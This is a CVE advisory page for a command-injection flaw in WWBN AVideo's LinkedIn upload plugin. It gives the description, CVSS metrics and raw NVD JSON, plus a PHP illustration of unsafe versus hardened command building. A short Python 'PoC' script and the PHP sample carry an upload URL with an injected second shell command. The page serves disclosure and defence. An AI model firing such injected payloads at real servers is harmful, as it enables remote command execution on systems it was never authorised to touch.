Security Vulnerability Report
CVE-2026-33319 CVSS 5.9 MEDIUM

CVE-2026-33319

Published: 2026-03-22 17:17:10
Last Modified: 2026-03-24 19:07:50

Description

WWBN AVideo is an open source video platform. Prior to version 26.0, the `uploadVideoToLinkedIn()` method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via `escapeshellarg()`. If an attacker can influence the LinkedIn API response (via MITM, compromised OAuth token, or API compromise), they can inject arbitrary OS commands that execute as the web server user. Version 26.0 contains a fix for the issue.
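The defect the description names is a classic CWE-78 shape: a string obtained from a third party (here, the upload URL in LinkedIn's API response) is interpolated into a shell command, so anything the shell treats as syntax in that string becomes part of the command. The PHP below is an added illustration written for this page, not code from the AVideo project or from its patch; the function names, the expected API host, the curl command line and the sample inputs are assumptions. It places the unsafe pattern beside a hardened version that validates the URL and then quotes every argument with `escapeshellarg()`, the step the advisory says was missing.

```php
<?php
declare(strict_types=1);

// Added illustration for CVE-2026-33319; not AVideo's code or its patch.
// Function names, the expected API host and the curl command line are assumptions.

// Unsafe pattern: a value taken from a remote API response is dropped into the
// command string verbatim, so shell metacharacters in it become part of the
// command line rather than part of the URL.
function buildUploadCommandUnsafe(string $uploadUrl, string $file): string
{
    return "curl -s -X PUT --upload-file $file $uploadUrl";
}

// Reject anything that is not a plain https URL on the host we expect, before
// it gets anywhere near a command line.
function validateUploadUrl(string $uploadUrl, string $expectedHost): string
{
    $parts = parse_url($uploadUrl);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        throw new InvalidArgumentException('upload_url is not a well-formed absolute URL');
    }
    if (strtolower($parts['scheme']) !== 'https') {
        throw new InvalidArgumentException('upload_url must use https');
    }
    // Exact host comparison: a suffix or substring check would accept an
    // attacker-chosen host that merely contains the expected name.
    if (strcasecmp($parts['host'], $expectedHost) !== 0) {
        throw new InvalidArgumentException('upload_url host is not the expected API host');
    }
    // Whitespace and control characters never belong in a URL; refuse the
    // value rather than try to clean it.
    if (preg_match('/[\s\x00-\x1F\x7F]/', $uploadUrl) === 1) {
        throw new InvalidArgumentException('upload_url contains whitespace or control characters');
    }
    return $uploadUrl;
}

// Hardened pattern: validate, then quote every argument with escapeshellarg()
// so the shell receives each one as a single literal word.
function buildUploadCommandSafe(string $uploadUrl, string $file, string $expectedHost = 'api.linkedin.com'): string
{
    $url = validateUploadUrl($uploadUrl, $expectedHost);
    return 'curl -s -X PUT --upload-file ' . escapeshellarg($file) . ' ' . escapeshellarg($url);
}

// Constructed sample inputs: a benign upload URL and one shaped like the
// injected value the description warns about.
$benign  = 'https://api.linkedin.com/mediaUpload/EXAMPLE-ASSET/feedshare-uploadedVideo/0';
$hostile = 'https://api.linkedin.com/upload; id #';
$file    = '/tmp/video.mp4';

// The unsafe builder emits a command line that now contains a second command.
echo buildUploadCommandUnsafe($hostile, $file), PHP_EOL;

// The safe builder quotes the benign URL and refuses the hostile one.
echo buildUploadCommandSafe($benign, $file), PHP_EOL;
try {
    buildUploadCommandSafe($hostile, $file);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Quoting with `escapeshellarg()` is the minimal correction and the one the advisory names; the more robust design is to not go through a shell at all (PHP's curl extension, or `proc_open()` with an argument array on PHP 7.4 and later), so that no quoting question arises. Because every precondition in the description involves influencing the API response, verifying the TLS certificate on the outbound request to the API is the defender's other lever against the MITM variant.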

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N

This is the Secondary (CNA) metric. The raw NVD record below also carries a Primary metric of 7.5 HIGH (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), which assumes only low privileges and rates the availability impact as high.

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo < 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Conceptual PoC for CVE-2026-33319
# Demonstrates how a malicious LinkedIn API response could trigger RCE
target_url = "http://target-avideo-site/plugin/SocialMediaPublisher/uploadVideoToLinkedIn.json"

# The attacker controls the 'upload_url' field in the API response
# Payload structure: [valid_url_prefix]; [malicious_command]; #[comment]
malicious_upload_url = "https://api.linkedin.com/upload; whoami; uname -a #"

payload = {
    "users_id": "1",
    "video_id": "1",
    "providers_id": "linkedin",
    "response": f'{{"upload_url": "{malicious_upload_url}"}}',
}

print(f"Sending payload to {target_url}...")
try:
    response = requests.post(target_url, data=payload)
    print(f"Status Code: {response.status_code}")
    print("Response:")
    print(response.text)
except Exception as e:
    print(f"Exploit failed: {e}")
```

References

https://github.com/WWBN/AVideo/commit/67d932eb05e1bc9b36796f73ff4f9fb47590598b (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-w5ff-2mjc-4phc (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33319",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-22T17:17:09.573",
    "lastModified": "2026-03-24T19:07:50.050",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the `uploadVideoToLinkedIn()` method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via `escapeshellarg()`. If an attacker can influence the LinkedIn API response (via MITM, compromised OAuth token, or API compromise), they can inject arbitrary OS commands that execute as the web server user. Version 26.0 contains a fix for the issue."
      },
      {
        "lang": "es",
        "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, el método 'uploadVideoToLinkedIn()' en el plugin SocialMediaPublisher construye un comando de shell interpolando directamente una URL de carga recibida de la respuesta de la API de LinkedIn, sin sanitización a través de 'escapeshellarg()'. Si un atacante puede influir en la respuesta de la API de LinkedIn (a través de MitM, un token OAuth comprometido o un compromiso de la API), puede inyectar comandos arbitrarios del sistema operativo que se ejecutan como el usuario del servidor web. La versión 26.0 contiene una solución para el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.7,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "26.0",
                "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/67d932eb05e1bc9b36796f73ff4f9fb47590598b",
        "source": "[email protected]",
        "tags": [
          "Patch"
        ]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-w5ff-2mjc-4phc",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```